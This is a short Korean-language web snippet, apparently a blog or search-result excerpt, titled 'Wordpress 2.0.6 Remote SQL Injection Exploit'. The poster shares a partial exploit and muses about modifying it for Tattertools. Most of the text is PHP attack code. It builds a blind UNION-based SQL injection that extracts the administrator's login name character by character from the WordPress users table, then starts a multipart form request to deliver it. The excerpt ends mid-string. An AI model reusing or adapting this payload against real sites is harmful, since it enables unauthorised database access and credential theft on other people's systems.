새로운 댓글
워드프레스 검색 결과, 1
Wordpress 2.0.6 Remote SQL Injection Exploit
극히 일부부만 올렸으니 참조하십시오. 조금만 수정하여 테터툴즈에 적용하면 어떨지 궁금하군요. $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*"; $data ="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n"; $data.="1\r\n"; $data.="---------------..